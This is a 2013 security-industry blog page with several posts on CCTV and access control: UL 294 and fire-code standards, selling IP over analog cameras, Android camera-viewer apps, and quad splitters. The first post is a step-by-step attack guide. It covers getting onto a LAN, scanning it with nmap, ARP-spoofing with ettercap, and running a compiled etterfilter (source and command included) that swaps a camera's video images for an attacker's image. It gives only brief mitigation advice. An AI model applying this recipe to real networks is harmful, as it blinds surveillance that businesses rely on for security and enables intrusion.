Friday, July 26, 2013

Manipulating IP based CCTV Systems

Manipulating IP based CCTV Systems.
As you are probably aware, CCTV networks provide security to businesses around the world. However due to unsecure networks and poorly designed networks, network security cameras can be abused and there video streams redirected or modified. I am going to explain how this can be done, so you can check your network.

1. Connect to the network using wireless or penetrate a machine on lan.
2. Upload nmap and ettercap onto your machine or the machine on lan that you penetrated.
3. Scan the internal network using nmap and look for open ports in this example we will look for cameras.
4. once you find a camera run ettercap and scan the machines and perform mitm.
5. Watch the traffic and look for the ip of the cameras by sniffing the traffic coming through your machine.
6. Look at the tcp.dst and tcp.src of the packets this will tell you the source and destnation packets.
7. Once you find a suitable camera and the client that is watching create an etterfilter, One is provided below

#Example etterfilter
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, “Accept-Encoding”)) {
replace(“Accept-Encoding”, “Accept-Rubbish!”);
# note: replacement string is same length as original string
msg(“zapped Accept-Encoding!\n”);
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace(“img src=”CAMERA PICURE URL HERE”, “img src=”YOUR IMAGE HERE WITH URL HERE” “);
replace(“IMG SRC=”CAMERA PICURE URL HERE”, “img src=”YOUR IMAGE HERE WITH URL HERE” “);
msg(“Filter Ran.\n”);
}

8. Save the file as a filter for example camera.filter
9. Compile that source using ‘etterfilter camera.filter -o camera.ef’
10. Now setup ettercap to use the filter each time the page is viewed across the network ‘ettercap -T -q -F camera.ef -M ARP // //’
11. Now in theory each time the camera is viewed by someone on the network they will see your camera image not the stream.

This attack has been used, and can be devastating to any business that depends on network cameras for security. Some businesses connect network cameras directly to the gateway router, if the gateway is penetrated then this places the cameras at risk.

Wireless networks also can provide attackers with a direct connection to your network once the encryption has been broken. Wireless networks with weak encryption and a lack of network monitoring can aid an attacker in becoming undetected on the network.

I recommend that you install either a hardware firewall that detects spoofing attacks inbetween the network cameras and router/switch, and use network encryption, this should provide a very difficult environment for an attacker.

Sunday, July 14, 2013

Access Control Standards Revolution Now In Progress

Access Control Standards Revolution Now In Progress 



Access control provides the ability to control, monitor and restrict the movement of people, assets or vehicles, in, out and round a building.

Access control is essential for all businesses to protect people and assets and has the added benefit of being expanded from controlling, for example, a single entrance door, to a large integrated security network. There are also huge potentials in terms of integrating other systems, such as Time and Attendance, Visitor Management, ANPR, Fire, Intruder and CCTV.

Few specifications are seen more commonly in access control than UL 294. However, aside from seeing it in print, very few understand what it means. In this note, we break apart and define this spec, describing why it is a vital part of many Access RFPs.


A Standard Defined
The scope of UL 294 covers three aspects of Access Control systems: 
  • Construction (Installation)
  • Performance
  • Operation
Essentially, the heart of UL 294 is a safety standard, where testing proves that system components can be assembled and operate reliably without hazard. In the case of access control, this is a step beyond just validating devices will not catch fire or spark - it attests that the system will not harm the safety or impede egress of those using the system.
In practical terms, this means doors will not accidentally stay locked and keep people in harm's way even during a malfunction. The UL standard subjects each labeled device to a range of testing designed to show the equipment meet relevant code expectations from:
  • NEC (NFPA 99): Requirements that each component will not create a hazard either during (recommended) install or use (Sparking, Grounding)
  • NFPA 72: Fire Code compliance, assures that controllers include interfaces with fire alarm/suppression systems 
  • NFPA 101: System devices 

A UL 294 mark is a 'extra step' the vendor has taken to 'prove' their equipment is safe, and it stands as a 'mark of assurance' when included in buying specifications that dubious equipment will not be purchased.

The Mark

While Underwriter's Laboratories offer a range of 'UL Symbols' that can be interpreted to signify different standards. In the case of UL 294, the mark looks like this:
The UL 'Security Mark' applies only to products such as intrusion detectors, burglar alarms, access control, safes, and vaults.

Performance Tests
UL 294 includes several tests that evaluate how well devices withstand damaging environments. Devices are subjected to atypical electrical, environmental, and brute force situations, including:
  • Variable Voltage
  • Variable Ambients (Environment)
  • Humidity
  • Endurance (Ruggedness)
  • Transients
  • Corrosion
  • Standby Power (Battery backup)
  • Physical Attack Toughness
Tests are performed individually and are not 'layered' or 'stacked' simultaneously as might occur in the field. The exact methodology for each test depends on the device being tested, but the resulting grade is given in four levels of security performance with Level I (lowest level security equipment) to Level IV (highest level security equipment). 

Exclusions
However, not all parts and features of an Access platform fall under the scope of UL 294. Two areas excluded from the scope include:
  • Headend Server/Database: The scope reads "The accuracy of logged data is not evaluated by this standard", and also "This standard does not apply to supplementary computer equipment that is not necessary for operation of the access control system..."
  • Intrusion Detection: Again, the scope details "Where an access control equipment and/or system incorporates the features and functions of a burglar alarm control unit, the requirements of the Standard for Proprietary Burglar Alarm Units and Systems, UL 1076, shall also apply"
This is important to note when careless specs are written that "All Access Equipment shall be UL 294 Certified", because this is inherently not possible. There will be major functional aspects outside the scope of the standard.

Large System Adoption
Especially for larger systems, UL 294 is common, including devices from: Mercury Security, C*Cure, S2, Maxxess, Sargent, etc.
However, certification is done on a component basis, and there may be gaps in a brand's portfolio. If UL 294 compliance is required in a system, every hardware component must be checked for conformity, as there is no 'system' certification.
Systems and platform intended for smaller deployments (<100 doors) typically forego the certification, because it simply is not a purchasing driver for many non-enterprise customers.

Prime Use
Regardless of the 'safety' overtures, like UL certification for surveillance equipment, 294 is primarily used to exclude non-compliant systems from specifications. UL 294 evaluation is not mandatory for Access Equipment, and many vendors forego the cost of certification especially when their offerings are not well suited for larger government, institutional, and hospital verticals where 294 is commonly cited. 
Likewise, while the mark's testing 'proves' that devices are safe, the onus remains on the field technician to install them in the correct fashion to indeed live up to the certification.

Remember once UL certification has void OEM is not responsible for any health & safety incident of your premises. UL certification void due to repairing through unauthorized service provider....etc.

NFPA 101
While NFPA 101 is comprehensive, the most relevant passages for access control include:
  • NFPA 101: 'Electrically Controlled Egress Doors' (2012: 7.2.1.5.6; 2009: 7.2.1.5.5)
  • NFPA 101: 'Releasing Devices' ( 2012: 7.2.1.5.10-12; 2009, 2006, 2003: 7.2.1.5.9 -7.2.1.5.11)
  • NFPA 101: 'Access Controlled Egress Doors' (7.2.1.6.2)
Specifically, requirements like Access Control Request to Exit (RTE), Exit Devices, and Delayed Egress foundationally conform to NFPA 101.

NFPA 72
In general, this code is the foundation of requirements that doors must release when fire alarms or smoke detectors go into alarm.

NFPA 80
Specifically, this code examines Fire Doors and how they are properly used for protection in a building. In many cases, these door types are also slated to become access-controlled openings, and the 'Locks or Latches (6.4.4)' section describes which modifications are permitted for access use without voiding their fire door ratings.

IBC: International Building Code
The IBC, published by the International Code Council, is essentially a guidebook for designing and engineering safe buildings.

If not observed directly as the authority, then whatever resulting codes that do have authority take guidance from the source.
  • ·     IBC: 'Door Operations' (2012, 2009: 1008.1.9; 2006, 2003: 1008.1.8)
  • ·       IBC: 'Sensor Release of Electrically Locked Egress Doors' (2012: 1008.1.9.8; 2009: 1008.1.4.4; 2006, 2003: 1008.1.3.4)
  • ·       IBC: 'Electromagnetically Locked Egress Doors' (2012: 1008.1.9.9; 2009: 1008.1.9.8)

Saturday, June 29, 2013

How To Convince Your Customers To Choose IP Cameras Over Analog



As IP surveillance technology becomes more affordable, it’s also becoming a more attractive solution for smaller installations – installations that used to be the sole domain of analog product. But how do you convince your customers to upgrade their analog to IP, preferably before an incident forces their hand? There are three primary selling points for an IP system of an Analog system – higher resolution, more in-depth analytics, and the ease of new network configuration.

Modern IP cameras generally offer a higher level of resolution than analog cameras. Almost all analog cameras will be limited to the equivalence of a 4CIF or D1 resolution (that is, 704 x 480 or 720 x 480). Many IP cameras boast 5MP resolutions or higher – that’s 15.5 times more pixels than a standard analog camera! And a higher pixel count means more usable surveillance information. This is especially important when it comes to identifying intruders. For positive identification, a general guideline is to have at least 12.7 pixels per inch across the face of a suspect. It’s much better to have that resolution in place during an incident, rather than upgrading to that resolution because the suspect could not be identified with footage from the existing system.

For positive identification, a general guideline is to have at least 12.7 pixels per inch across the face of a suspect.

Another way to utilize this higher resolution as a selling point is the potential lower cost of the total installation. A camera with 5MP mounted 10 feet away from the viewing area will be able to provide identification level resolution across 17 feet horizontally, while a standard analog camera can only cover just over a quarter of this area. This means that you would need four analog cameras to provide the same level of coverage as one 5MP IP camera. When cables, software licenses, mounting hardware, lenses, and all other costs are factored in this can make the IP installation much more appealing from a cost basis.

Another advantage that IP cameras have is the ability to perform increasingly sophisticated analytics onboard the camera itself. Most recorded video is never watched – typically, footage is only reviewed when there is an incident. This is especially true on small installations that do not have a dedicated security guard. With the advent of on-board analytics, IP cameras themselves can now be programmed to independently analyze events, interact with other alarm systems, and send email or text alerts with pictures to interested parties. For example, a camera can be programmed to watch a specific door and only send an alert if that door is opened after regular business hours. At the very least, analytics can make it easier to sift through footage after the fact.
Finally, a lot of customers are concerned that IP video is overly complicated to manage when compared to an analog system. It’s true, earlier versions of IP cameras did require some level of networking know-how. But newer cameras are getting extremely close to plug-and-play with features that automatically detect and configure cameras added to a network through tools such as DDNS, DHCP, and other networking protocols. Depending on the brand selected, all that could be involved in the installation of a new device is plugging the camera into the switch and then selecting “Detect New Hardware” in the accompanying software. Network cameras can also run on existing network infrastructure and only one cable is required for both data and power with Power over Ethernet technology.

As every device begins to merge onto the network, it makes sense that security cameras move there as well. An IP video installation may cost more than a conventional analog system, but the price difference is getting smaller – and the benefits are increasing.

Wednesday, June 26, 2013

Android IP Camera Android Apps

Android IP Camera Android Apps
As a well-known eSecurity Professional in India I got many appreciation call/mail for my Blog writing. Thanks to all of you for read and understand my wrong English writing on my blog. Recently I visit Bhubaneswar (Located in India, Capital of Orissa) and face some question, customer ask you people highlight our NVR/ DVR is support Remote viewing on Android enable phone, but we are not enjoy the benefits of mobile security camera monitoring through our android phone. Our System Integrator / Installer technical person come and say something that we are not understands. So you’ve come to the right place. Many of today’s most trusted manufacturers of IP security cameras, DVR, NVRs, and video management software offer Android IP camera apps for safe and reliable monitoring. I share with you a list of Android security camera apps offered by manufacturers, and the high-end features available on each.

Optica
Android Security Camera App Name: OpticaMobile
Optica, a leading manufacturer of high-definition IP cameras, offers OpticaMobile and OpticaMobile HD mobile apps designed for iPhone, iPad, and Android devices. OpticaMobile delivers a wide spectrum of features to improve the viewing experience for all Optica IP cameras, including quad-view mode, live video streams, bookmarking, audio, snapshots, dual stream support, and PTZ control of Optica’s P218Z speed dome. It’s an easy and convenient way to tap into your Optica IP camera system while on the go. OpticaMobile HD is built for use on the iPad, while OpticaMobile is compatible with iPhone and Android devices.

Milestone
Android IP Camera App Name: XProtect Mobile
Created by Milestone, one of world’s leading developers of video management software, the XProtect Mobile Android security app offers a bevy of features catered to on-the-go surveillance users. With an average rating of 4.6, with 5 being the highest score, users have raved about its built-in features and usability. What’s great about this video surveillance app is how many cameras you’re able to view and manage at once. Users were most excited about the number of cameras they can monitor on this app – one even wrote that the app was able to support all 38 of the user’s IP cameras. Key features include video push, control of inputs and outputs, control of PTZ cameras, viewing live video feed from numerous remote security cameras, snapshot sharing to send via email or MMS, and compatibility with WiFi, 3G, and 4G networks.

Smartvue
Android IP Camera App Name: Smartvue Android App
Smartvue has remained on the cutting-edge of NVR technology since its inception. Recognized as an innovator in this market, Smartvue offers complimentary remote video surveillance access to its NVRs so you can check your IP cameras while on-the-go. Designed for Android versions 2.2 and up, the Smartvue Android App gives you complete access to your IP camera system when you’re physically off-site. With the Smartvue Android App installed, you can view your live video feed, playback archived recordings, swipe the screen to change cameras, control display settings as needed, monitor multiple cameras at once, and control PTZ functions. It also works with a wide variety of IP camera brands and body styles. Users have given this video surveillance app excellent ratings for its convenience, ease-of-use, and intuitively designed interface.

VivoTek
Android IP Camera App Name: iViewer LITE
This Android IP camera viewer app offered by Vivotek enables surveillance users to monitor live streaming video from all of their IP cameras, or those that are managed by Vivotek’s video management software for up to 360 seconds at a time. Note that this app currently works only with Android V2.3 and higher. Supporting IP cameras from a multitude of server connections, this app allows PTZ control via the touch screen, real-time video switching for different display options, image snapshots, single-channel playback by search, and the ability to playback recorded video for 1, 2, 5, and 10 minute intervals Additionally, you can configure your app to support fisheye camera views.

QNAP
Android IP Camera App Name: VMobile
Offered by NVR manufacturer QNAP, the VMobile Android App facilitates remote and wireless monitoring of IP cameras by connecting to the company’s VioStar NVR through Android versions v1.6, v2.1, and v2.2. VMobile is able to manage an unlimited number of servers and cameras for a wide variety of IP camera brands and body styles. With this app, you’re able to adjust the display mode, control PTZ, receive notifications if your IP camera detects tampering or vandalism, and capture snapshots that you want to save. You’re also able to playback recorded video from each of your IP cameras and search recorded video based on date and time.

EverFocus
Android IP Camera App Name: MobileFocus & MobileFocusPlus
Through the MobileFocus Android security camera app, you can connect to Everfocus DVRs and IP cameras at the touch of a button. Everfocus is one of the leading manufacturers of CCTV cameras, DVRs, and professional security products, including a select line of IP cameras catered to the ever-growing IP surveillance market. The mobile monitoring app’s easiest functions are viewing your cameras in real-time and controlling PTZ remote security camera models. Auxiliary mobile monitoring technologies include device management, channel control, gesture digital zoom, image snapshots, and full screen mode.

Saturday, June 15, 2013

CCTV Quad Splitter


The Video quad splitter is a very important component of close circuit television systems. Quad splitters were developed to eliminate the not so cost effective way of one camera per monitor and time lapse recorder design. A Quad enables the user to view up to four cameras on the same screen simultaneously. It displays all cameras on the screen two on the top quadrants and two on the bottom quadrants. This gives the user a tremendous advantage over security camera systems using video sequential or manual switchers. Using a quad, the system operator will not miss any activity he or she would have if they were using a sequential or manual switcher. However there is a slight drawback to the quad splitter. Its images can sometimes be too small to distinguish any specific details on an image, especially when using small CCTV monitors.

While viewing a live feed this drawback can be overcome since the quad allows full screen viewing of any camera with a simple push of a button. However the same cannot be said once a picture has been recorded. When a quad output is recorded, it is recorded the same exact way as it is seen on the screen. Therefore if a quad view is being displayed while recording that’s the only way it can be retrieved on playback. And if an operator has switched to a full screen camera view while recording that will be the only camera that could be viewed on playback. As you can see this could pose a problem in many applications and is also the main reason why many people upgrade theirs systems from quads to video multiplexers.

Monochrome cctv Quads
Monochrome Quads are designed for use with black and white cameras can also be used with color cameras but the picture on the screen will always be displayed in black and white. They are Ideal for use in pubs, clubs, hotels, commercial and residential premises

Color cctv Quads
Color quads are designed for use with color cameras but can also be used with black and white cameras. They are commonly uses in pubs, clubs, hotels, commercial and residential premises

Dual page cctv quads
Dual page quads are equipped with 8 video input to allow for up to 8 camera connection. The picture is displayed in two separate groups of four cameras. The switch between the two groups can be done manually or it can be set automatically at a predetermined switch time.